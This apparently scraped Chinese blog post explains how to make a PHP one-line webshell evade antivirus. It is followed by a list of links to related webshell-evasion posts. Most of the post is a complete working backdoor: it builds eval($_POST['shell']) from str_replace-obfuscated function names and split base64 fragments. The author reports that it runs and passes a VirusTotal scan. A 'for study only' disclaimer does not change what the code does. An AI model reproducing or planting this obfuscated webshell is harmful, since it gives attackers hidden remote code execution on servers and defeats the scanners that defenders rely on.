PHP一句话木马免杀(通过VirusTotal测试)
PHP一句话木马免杀
仅用于学习与交流,请勿用于非法用途!!!
简介与思路
免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。
其思路基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。说白了就是用各种各样的方法(比如拼接,编码,加密等)来隐藏关键代码。
流程
先写出基本语句
<?php
eval($_POST['shell']);
?>
准备几个函数来对基本语句进行伪装
<?php
eval($_POST['shell']);
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");
// 思路是先在str_replace中写好要构造的函数,
// 这里是打算把$huan这个变量当成str_replace函数来用
// 就先把第一三个参数填好,第一个随便填,第三个先填成要转换的目标
// 得$huan = str_replace("ac","","str_replace")
// 接着把第一个参数里面的东西随便插入进去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = str_replace("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 这里是打算把$jiemi这个变量当成base64_decode函数来用
$hanshu = str_replace("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 这里是打算把$hanshu这个变量当成create_function函数来用
?>
把基本语句进行base64加密
$a="ZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOw==";
// 把基本语句进行base64加密
将加密后的语句拆分开
// 把基本语句进行base64加密,随便插入点字符
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";
组装
$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前准备好的函数和字符串把需要的语句拼出来,拼成一个匿名函数
调用
$ans();
// 调用这个函数
完整代码
<?php
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");//密码是shell
// 思路是先在str_replace中写好要构造的函数,
// 这里是打算把$huan这个变量当成str_replace函数来用
// 就先把第一三个参数填好,第一个随便填,第三个先填成要转换的目标
// 得$huan = str_replace("ac","","str_replace")
// 接着把第一个参数里面的东西随便插入进去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = $huan("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 这里是打算把$jiemi这个变量当成base64_decode函数来用
$hanshu = $huan("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 这里是打算把$hanshu这个变量当成create_function函数来用
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";
// 将加密后的语句拆分开
$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前准备好的函数和字符串把需要的语句拼出来,拼成一个匿名函数
$ans();
// 调用这个函数
?>
可用性测试
可以发现这个马是可以用的
云沙箱测试
VirusTotal
结果非常理想
PHP一句话木马免杀(通过VirusTotal测试)相关推荐
- 各类一句话木马免杀集合
各类一句话木马免杀集合,基本过D盾与安全狗,php.asp.aspx.jsp一句话和冰蝎,我写的文章链接如下: https://www.cnblogs.com/joke-ljh/p/13794125. ...
- PHP一句话木马免杀学习
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POS ...
- PHP之一句话木马免杀
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数. 2.通过PHP的动态函数方法执行一句话. 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接 ...
- 渗透测试-木马免杀的几种方式
木马免杀的几种方式 文章目录 木马免杀的几种方式 前言 1.裸奔马的尝试 2.部署一下kali上的apache服务,令目标机器能够访问下载我们生成的木马 2.1.kali中是自带有apache的,启动 ...
- 木马免杀原理及方法(超全)
灰鸽子免杀 概况 免杀意为免除被杀毒 软件杀掉的软件. 灰鸽子免杀简介:本工具为纯绿色工具,软件采用独特的查杀技巧可完全查杀灰鸽子全系列(VIP2005.vip2006.免杀处理) 木马,本软件已经过 ...
- 0x06 木马免杀篇、0x07应急与响应、0x08 安全防御篇、0x09 其他问题篇
来源如下图:(微信公众号:0x00实验室) 0x06 木马免杀篇 免杀可以先fuzz 定位出被查杀的语句,然后对被查杀那部分进行一波操作,像是加密啊.编 码啊.动态执行啊什么的,或者 ...
- MSF编码+VS编译木马免杀
MSF编码+VS编译木马免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e ...
- 052 木马免杀全攻略
木马免杀全攻略 转载自:a1pass.blog.163.com 2007-12-07 14:02:24| 分类: 思绪燃星火--技 | 标签:黑客 杂志刊物 作者:A1Pass 出处:http://a ...
- msfvenom——木马免杀篇
msfvenom--木马免杀篇 目录 msfvenom--木马免杀篇 c语言执行 生成shellcode.c c语言执行 检查 python语言执行 方法一:python加载C代码 方法2:py2ex ...
最新文章
- linux c uuid guid 生成
- 二叉搜索树(Binary Search Tree)(Java实现)
- apache禁止访问文件或目录执行权限、禁止运行脚本PHP文件的设置方法
- Python:threading(多线程操作)(转载)
- 三脚升压电感工作原理
- WPF使用GMap.net框架开发地图应用
- windows飞行模式被强制开启,无法关闭,我来带你解决问题
- JTAG与SWD接口定义映射
- Idea快速入门指南
- 【安装系统】U盘安装系统教程,使用UltraISO制作U盘启动盘
- Matlab:多项式的四则运算
- mybatis-plus模板
- STM32F407与STM32F105 CAN通讯失败的定位解决
- 苹果cmsv10白色简约好看的影视站自适应模板源码
- 对蚁群算法中轮盘赌选择城市的理解
- js生成n个和为固定sum的随机整数
- Java 数字添加千分位
- 5-24 css内容的补充
- WebView展示pdf
- rollingcube